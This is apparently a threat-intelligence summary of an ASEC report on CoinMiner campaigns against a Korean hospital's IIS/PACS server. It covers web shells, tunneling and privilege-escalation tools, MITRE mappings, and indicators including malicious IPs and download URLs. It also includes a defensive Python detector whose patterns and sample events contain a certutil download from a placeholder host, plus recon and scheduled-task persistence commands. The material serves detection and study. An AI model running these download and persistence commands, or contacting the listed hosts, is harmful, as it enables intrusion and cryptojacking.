Two separate CoinMiner campaigns targeted a Korean medical institution’s Windows IIS/PACS server, exploiting web-facing vulnerabilities and deploying multiple web shells and mining payloads. The attacks, likely conducted by Chinese-speaking threat actors, leveraged proxy tools and remote-access utilities to establish persistence and mine cryptocurrency while potentially exfiltrating data. #CoinMiner #Chopper #Behinder #CPOLAR #RingQ #GodPotato #EarthWorm #Ladon #Frpc #IIS #PACS #KoreanWebServers #ASECBlog
Keypoints
- ASEC tracked two separate CoinMiner attack cases against a vulnerable Korean web server hosting PACS on Windows IIS.
- Attackers uploaded web shells (Chopper, Behinder, Godzilla) and used tunneling/proxy tools (CPOLAR, Frpc, Lcx, EarthWorm) to expose the internal system and enable remote access.
- The threat actors appear to be Chinese-speaking, based on tool choices and Chinese annotations found in scripts.
- CoinMiner was delivered via a cab/downloader chain (1.cab containing 1.bat, a task-scheduler XML, and a CoinMiner downloader) that downloads additional payloads from external sources.
- Privilege escalation tools (BadPotato, GodPotato, PrintNotifyPotato, IIS LPE) and network tools (NetCat) were deployed to move laterally and control the infected host.
- The second attack reused web shells (Chopper, Behinder, Godzilla) and added new components (Certutil downloader, Ladon, RingQ) to extend access and evade detection.
- The ongoing objective across campaigns was cryptocurrency mining via XMRig, with multiple mining pools listed as targets.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Initial access via exposed web servers with web shells uploaded; “Multiple web shell upload attempts were identified on the targeted web server”.
- [T1082] System Information Discovery (Windows Command Shell: T1059.003) – The threat actor used commands to collect system information: “whoami, ipconfig, tasklist, systeminfo, netstat -ano, query user, ping 8.8.8.8”.
- [T1059.003] Windows Command Shell – Direct execution of commands to enumerate system details.
- [T1105] Ingress Tool Transfer – Downloading “1.cab” containing “1.bat”, an XML for task scheduler, and a CoinMiner downloader; “The downloader also downloads and installs a zip file from an external source.”
- [T1021.001] Remote Services: Remote Desktop Protocol – Use of tunneling/proxy tools to expose internal hosts and enable remote access via RDP; “expose systems… enabling threat actors to remotely access them via RDP from the outside.”
- [T1136] Create Account – Adding new user accounts for persistent access; “the ‘useradd.exe’ malware… adds the account with a random password and displays the result.”
- [T1027] Obfuscated/Compressed Files or Information – RingQ encrypts malware/tools to evade detection and executes them in memory; “encrypts typical malware and tools to prevent easy detection by anti-malware products, then executes them in the memory.”
- [T1068] Exploitation for Privilege Escalation – Deploying privilege escalation tools (BadPotato, GodPotato, PrintNotifyPotato, IIS LPE) and referencing CVE-2021-1732 malware; “privilege escalation tools… and the CVE-2021-1732 vulnerability malware.”
- [T1003] Credential Access – Ladon includes account credential theft among its functions; “major functions include scanning, privilege escalation, account credential theft, and reverse shell.”
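A defender-side check suggested by the discovery commands, the Certutil downloader and the task-scheduler XML listed above, written here as an added example and not taken from the ASEC post: it flags command shells spawned by the IIS worker process (where the web shells run) and tags what each command line is doing. The sample events, the placeholder download URL and the tag names are constructed for the example.

```python
import json
import ntpath
import re

# IIS worker process: the web shells (Chopper, Behinder, Godzilla) run inside it,
# so any command shell it spawns is worth a look.
IIS_WORKER = "w3wp.exe"
SHELLS = {"cmd.exe", "powershell.exe"}

# Command-line patterns keyed by the behaviour they indicate. The discovery
# commands are the ones ASEC reports; the other two mirror the Certutil
# downloader and the scheduled-task XML described in the post.
PATTERNS = {
    "discovery": re.compile(
        r"\b(whoami|ipconfig|tasklist|systeminfo|netstat\s+-ano|query\s+user|ping\s+8\.8\.8\.8)\b", re.I),
    "download": re.compile(r"\bcertutil(\.exe)?\b.*-urlcache", re.I),
    "persistence": re.compile(r"\bschtasks(\.exe)?\b.*/xml\b", re.I),
}

def classify(event):
    """Return behaviour tags for one process-creation event, or [] if not suspicious."""
    parent = ntpath.basename(event["parent_image"]).lower()
    child = ntpath.basename(event["image"]).lower()
    if parent != IIS_WORKER or child not in SHELLS:
        return []
    tags = [name for name, rx in PATTERNS.items() if rx.search(event["command_line"])]
    return tags or ["shell_from_iis"]  # a shell under w3wp.exe is notable on its own

def detect(events):
    """Run classify() over process-creation events and return one alert per hit."""
    return [
        {"pid": ev["pid"], "tags": tags, "command_line": ev["command_line"]}
        for ev in events
        if (tags := classify(ev))
    ]

# Constructed sample events in a Sysmon-like shape (not taken from the ASEC post);
# the download URL is a placeholder, not a real indicator.
SAMPLE_EVENTS = [json.loads(line) for line in r'''
{"pid": 4120, "parent_image": "C:\\Windows\\System32\\inetsrv\\w3wp.exe", "image": "C:\\Windows\\System32\\cmd.exe", "command_line": "cmd.exe /c whoami & ipconfig & netstat -ano"}
{"pid": 4188, "parent_image": "C:\\Windows\\System32\\inetsrv\\w3wp.exe", "image": "C:\\Windows\\System32\\cmd.exe", "command_line": "cmd.exe /c certutil -urlcache -split -f http://PLACEHOLDER.example/1.cab C:\\Windows\\Temp\\1.cab"}
{"pid": 4201, "parent_image": "C:\\Windows\\System32\\inetsrv\\w3wp.exe", "image": "C:\\Windows\\System32\\cmd.exe", "command_line": "cmd.exe /c schtasks /create /tn Update /xml C:\\Windows\\Temp\\task.xml"}
{"pid": 4233, "parent_image": "C:\\Windows\\System32\\inetsrv\\w3wp.exe", "image": "C:\\Windows\\System32\\cmd.exe", "command_line": "cmd.exe /c dir C:\\inetpub\\wwwroot"}
{"pid": 5010, "parent_image": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\cmd.exe", "command_line": "cmd.exe /c whoami"}
'''.strip().splitlines()]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert["pid"], alert["tags"], alert["command_line"])
```

The last sample (cmd.exe under explorer.exe) is deliberately not alerted on, since the rule keys on the IIS worker as parent rather than on the recon commands alone.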
Indicators of Compromise
- [MD5 Hash] First Attack Case – 67af0bc97b3ea18025a88a0b0201c18d, f6591c1ab7f7b782c386af1b6c2c0e9b, and 2 more hashes
- [IP Address] – 14.19.214.36:6666, 14.19.214.36:3333
- [IP Address] – 141.11.89.42:8443, 141.11.89.42:995
- [Domain/URL] – sinmaxinter.top:7001/services.zip, sinmaxinter.top:7001/C3-server25.zip
- [Domain/URL] – info.perflogs.top:995, pop3.wptask.cy0u:995
Read more: https://asec.ahnlab.com/en/66994/